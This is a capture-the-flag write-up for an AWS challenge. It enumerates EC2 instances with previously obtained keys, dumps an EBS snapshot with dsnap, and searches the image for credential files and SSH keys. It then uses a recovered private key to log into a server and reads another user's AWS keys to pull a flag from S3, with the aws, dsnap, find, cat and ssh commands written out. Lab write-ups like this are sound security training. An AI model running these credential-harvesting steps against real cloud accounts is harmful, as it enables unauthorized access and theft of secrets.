Pulled from the sky


Solve

While in the AWS Console, let's use the console user interface to enumerate.

We identified two running EC2 instances (the same enumeration can also be reproduced from the CLI, as sketched below):

  • admin: 54.211.110.193

  • web-prod: 44.208.228.94
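
As a rough illustration only: the profile name haru is an assumption based on the credentials used for this flag, and the queries simply trim the output.

```bash
# Sanity-check whose credentials we are holding (profile name "haru" is an assumption)
aws sts get-caller-identity --profile haru

# Running EC2 instances with their Name tag and public IP
aws ec2 describe-instances --profile haru \
  --query 'Reservations[].Instances[].{Name:Tags[?Key==`Name`]|[0].Value,IP:PublicIpAddress,State:State.Name}' \
  --output table

# AMIs and EBS snapshots owned by this account (the snapshot is what we will dump)
aws ec2 describe-images --owners self --profile haru
aws ec2 describe-snapshots --owner-ids self --profile haru
```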

As we do not have access to the EC2 machines via SSM, the next best option is to look into the snapshots to see if there are any sensitive files inside.

First, let's configure the credentials we obtained from the previous flag and verify that they are working properly.

Next, referring to the HackTricks and RhinoSecurityLabs articles linked in the Reference section, we dump the snapshot with dsnap. For the exact instructions on installing and using dsnap, please refer to those articles.
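
A minimal sketch of that step, assuming the keys from the previous flag and a snapshot ID found during enumeration (the profile name and snapshot ID below are placeholders):

```bash
# Store the recovered keys under a named profile and confirm they work
aws configure --profile haru
aws sts get-caller-identity --profile haru

# Install dsnap via pipx, then list and download the target snapshot
pipx install 'dsnap[cli]'
AWS_PROFILE=haru dsnap list
AWS_PROFILE=haru dsnap get snap-xxxxxxxxxxxxxxxxx   # writes the volume to a local .img file

# dsnap ships a Dockerfile to mount the downloaded image and drop into a shell;
# build and run it as described in the articles linked under Reference
```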

Doing some manual enumeration of the snapshot's file system, we found a few interesting files and folders (a triage sketch follows the list):

  • /home/nacer/.azure

  • /root/.aws/credentials

  • /home/nacer/.aws/credentials
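
Inside the shell on the mounted image, a quick triage along these lines is what surfaced those paths; the mount point and key filename are assumptions, so treat this purely as a sketch.

```bash
# Hunt for cloud credentials and SSH material in the mounted filesystem
find / -maxdepth 4 \( -name credentials -o -name "id_*" -o -name "*.pem" \) 2>/dev/null

# Inspect the interesting locations found above
ls -la /root/.aws /home/nacer/.aws /home/nacer/.azure /home/nacer/.ssh
cat /home/nacer/.aws/credentials   # these keys turned out to be rotated/expired
cat /home/nacer/.ssh/id_rsa        # key filename is an assumption; use whatever is present
```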

However, when we attempt to use those credentials, they turn out to be unusable, most likely because they have expired or been rotated out.

We are, however, still able to retrieve the private and public key from the /home/nacer/.ssh folder.

Copying out the private key, let's attempt to use it to SSH into the web-prod server.
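
Roughly as follows; the key filename is arbitrary, the nacer username is assumed from the key's home directory, and the IP is web-prod's public address from the earlier enumeration.

```bash
# Save the private key copied out of the snapshot and restrict its permissions
chmod 600 nacer_id_rsa

# SSH into web-prod as nacer
ssh -i nacer_id_rsa nacer@44.208.228.94
```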

Recall how we previously tried using the credentials found in the docker container, only for them to be unusable; we now have our answer: the AWS keys are set to rotate daily.

Let's copy out the current nacer access keys.

Back in Flag 1, we found an S3 bucket that haru wasn't able to access. Let's try using nacer's credentials to access that bucket now.

We then managed to retrieve the flag successfully from the S3 bucket.
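
For completeness, the last hop looks roughly like this; the nacer profile holds the keys read from web-prod, and the bucket name is a placeholder since the real one is specific to the challenge.

```bash
# Configure a profile with nacer's current (daily-rotated) keys from web-prod
aws configure --profile nacer

# List the bucket that haru could not read, then stream the flag to stdout
aws s3 ls s3://<target-bucket> --profile nacer
aws s3 cp s3://<target-bucket>/flag.txt - --profile nacer
```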

TLDR

  • Enumerate the AWS console with Haru's credentials

  • Identify the running EC2 instances along with their snapshots

  • Use dsnap to dump the snapshot

  • The snapshot contains a private key

  • Use the private key to SSH into the web-prod EC2 instance and grab nacer's access key ID and secret access key

  • Retrieve the flag from S3

Reference

  • HackTricks, AWS EBS Snapshot Dump: https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html

  • RhinoSecurityLabs, Exploring AWS EBS Snapshots: https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/
(Screenshots, in order: more IAM usernames added to loot; policies visible but not readable with current permissions; running EC2 instances; no permissions over S3; AMI owned by haru; snapshot owned by haru; installing dsnap using pipx; downloading the snapshot using dsnap; building the docker container; running the docker container and dropping into a shell; nacer's private key (redacted); successful SSH; nacer's AWS credentials; listing the bucket; getting bucket objects; redacted flag.txt)